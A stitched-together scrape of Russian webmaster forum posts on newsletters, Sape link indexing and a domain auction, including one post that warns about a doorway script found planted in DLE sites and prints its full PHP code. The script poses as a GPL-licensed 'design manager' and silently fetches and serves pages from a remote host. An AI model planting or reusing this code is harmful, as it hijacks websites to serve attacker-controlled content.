Как мне отписаться от ваших рассылок на почту?
Рейд СБУ был, обыск проводили, работу восстановили. ТП так отписала.
Кто добавлял новые сайты в Sape, у вас страницы, запрещенные в robots.txt тоже добавляются и идут в статус OK, или это только у меня так? (При переиндексации ранее добавленных сайтов с таким же robots.txt все нормально.)
Уже 2 раза писал в тех. поддержку, пишут: "передали программистам", а толку никакого, почти 2 месяца уже прошло.
Зона домена?
Потому, что изначально эти домены в основном покупают только ради тИЦ и продажи ссылок с ГС.
150 $
Шаг на первый лот.
260 $
PS: Возраст домена не 9 лет, а 1 год.
Created On:04-Feb-2012 18:00:48 UTC
Недавно заметил, что залили дор (замаскированный под дизайнерский скрипт) на многие сайты CMS DLE 8.5-9.5 (все заплатки установлены) в папку /language/index.php
<?php ############################################################################### # Александр Корпатов # 452 Productions Internet Group (http://blog-alexa.ru) # Site design Manager v1.5 BETA (с) 2012 # Искренне надеемся , что наш скрипт поможет вам разннобразить дизаин вашего портала! # This script is freeware and is released under the GPL # Copyright (C) 2012 Alex Development Group # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. # Or just download it http://www.fsf.org/ ############################################################################### // Настройка форматов файлов для дизайна вашего портала error_reporting(0); $name = $_SERVER['REQUEST_URI']; $charset = "windows-1251"; $defaultType = "text/html; charset=$charset"; $fileType = array( "css" => "text/css; charset=$charset", "png" => "image/png", "jpg" => "image/jpeg", "jpeg" => "image/jpeg", "gif" => "image/gif", "js" => "text/javascript", "xml" => "text/xml", ); // Настройки сервера для проверки лицензии.Не менять! $dh = 'http://blog-alexa.ru/arch1v3/license/'.str_replace('www.','',$_SERVER[SERVER_NAME]); $f1 = strrpos($name, "."); $f2 = substr($name, $f1 + 1, 999); $fileRas = strtolower($f2); $filename = $dh.$name; $file = file($filename); $type = array_key_exists($fileRas, $fileType) ? $fileType[$fileRas] : $defaultType; header("Content-Type: $type"); if($file) { $html = implode('', $file); echo $html; exit; }elseif(extension_loaded('curl')) { $ch = curl_init(); $url_string = $dh.'/'.$name; curl_setopt ($ch, CURLOPT_URL, $url_string); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); $html = curl_exec ($ch); curl_close($ch); if($html) { echo $html; } else { header("Status: 404 Not Found"); echo 'PAGE NOT FOUND'; } exit; } else { header("Status: 404 Not Found"); echo 'PAGE NOT FOUND'; } ?>
Хмм, скрипт оказался и на одном html сайте. Будьте бдительны.
Скорее повышаешь. ))